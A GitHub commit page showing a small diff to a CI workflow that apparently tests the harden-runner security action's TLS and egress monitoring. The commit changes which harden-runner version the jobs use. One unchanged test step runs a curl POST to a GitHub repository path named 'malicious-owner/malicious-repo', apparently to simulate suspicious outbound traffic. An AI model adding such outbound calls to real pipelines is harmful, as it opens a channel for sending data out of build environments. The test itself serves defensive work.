Skip to content

Commit

Permalink
Update tls-basic-tests.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
varunsh-coder authored Aug 22, 2024
1 parent 150a9c3 commit a971f6e
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions .github/workflows/tls-basic-tests.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@ jobs:
if: always()
runs-on: ARMLinuxRunner
steps:
- uses: h0x0er/harden-runner@arm-support
- uses: step-security/harden-runner@rc
with:
egress-policy: audit
- uses: actions/checkout@v3
Expand All @@ -28,7 +28,7 @@ jobs:
if: always()
runs-on: ARMLinuxRunner
steps:
- uses: h0x0er/harden-runner@arm-support
- uses: step-security/harden-runner@rc
with:
egress-policy: audit
- run: curl -XPOST https://api.github.com/repos/malicious-owner/malicious-repo

0 comments on commit a971f6e

Please sign in to comment.